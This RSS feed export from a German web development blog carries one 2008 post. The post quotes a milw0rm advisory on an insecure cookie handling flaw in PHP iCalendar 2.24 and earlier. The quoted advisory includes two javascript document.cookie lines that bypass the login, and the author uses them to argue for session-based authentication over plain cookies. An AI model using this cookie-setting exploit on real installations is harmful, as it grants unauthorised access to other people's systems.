<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>trafex &#187; Nutzerauthentifizerung</title>
	<atom:link href="http://trafex.de/blog/tag/nutzerauthentifizerung/feed/" rel="self" type="application/rss+xml" />
	<link>http://trafex.de</link>
	<description>webdev blog</description>
	<lastBuildDate>Sun, 22 Nov 2009 19:55:34 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Authentifizierung und Anfängerfehler</title>
		<link>http://trafex.de/blog/28/authentifizierung-und-anfangerfehler/</link>
		<comments>http://trafex.de/blog/28/authentifizierung-und-anfangerfehler/#comments</comments>
		<pubDate>Tue, 23 Sep 2008 21:46:51 +0000</pubDate>
		<dc:creator>StefanB</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[anfängerfehler]]></category>
		<category><![CDATA[authentifizierung]]></category>
		<category><![CDATA[cookies]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[milw0rm]]></category>
		<category><![CDATA[Nutzerauthentifizerung]]></category>
		<category><![CDATA[php icalendar]]></category>
		<category><![CDATA[phpicalendar]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://trafex.de/?p=28</guid>
		<description><![CDATA[Heute habe ich bei milw0rm.com folgenden Fehler im Script &#8220;PHP iCalendar&#8221; gefunden:
####################################################################
[+] PHP iCalendar &#60;= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my freind
####################################################################
---
exploit:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";
# milw0rm.com [2008-09-22]
Quelle: http://www.milw0rm.com/exploits/6526
Dieses Beispiel zeigt man wieder aufs deutlichste das man einfache Cookies nicht zur Authentifizierung benutzen sollte. Alle Scriptsprachen bieten [...]]]></description>
			<content:encoded><![CDATA[<p>Heute habe ich bei milw0rm.com folgenden Fehler im Script &#8220;PHP iCalendar&#8221; gefunden:</p>
<pre>####################################################################
[+] PHP iCalendar &lt;= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my freind
####################################################################
---
exploit:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";</pre>
<pre># milw0rm.com [2008-09-22]
Quelle: http://www.milw0rm.com/exploits/6526</pre>
<p>Dieses Beispiel zeigt man wieder aufs deutlichste das man einfache Cookies nicht zur Authentifizierung benutzen sollte. Alle Scriptsprachen bieten mindestens eine Art von Session-System, mit dem man eine Nutzerauthentifizerung auf einfache Art und Weise implementieren kann und an allen Stellen wird darauf hingewiesen das Cookies unsicher sind. Um so schlimmer ist es auch noch das solche Scripte öffentlich angeboten werden. Ein Grund mehr nicht jedem Script, welches angeboten wird, zu vertrauen.</p>
]]></content:encoded>
			<wfw:commentRss>http://trafex.de/blog/28/authentifizierung-und-anfangerfehler/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Dynamic Page Served (once) in 0.123 seconds -->
